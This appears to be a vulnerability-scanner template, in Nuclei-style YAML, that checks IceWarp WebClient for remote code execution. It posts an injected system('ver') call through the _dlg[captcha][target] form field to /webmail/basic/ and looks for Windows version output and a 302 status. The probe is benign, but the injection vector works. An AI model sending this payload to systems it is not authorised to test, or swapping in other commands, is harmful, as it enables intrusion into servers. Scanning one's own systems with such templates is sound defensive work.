id: icewarp-webclient-rce

info:
  name: IceWarp WebClient RCE
  author: gy741
  severity: critical
  reference:
    - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
  tags: icewarp,rce

requests:
  - raw:
      - |
        POST /webmail/basic/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _dlg[captcha][target]=system(\'ver\')\

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Microsoft Windows [Version"
        part: body

      - type: status
        status:
          - 302
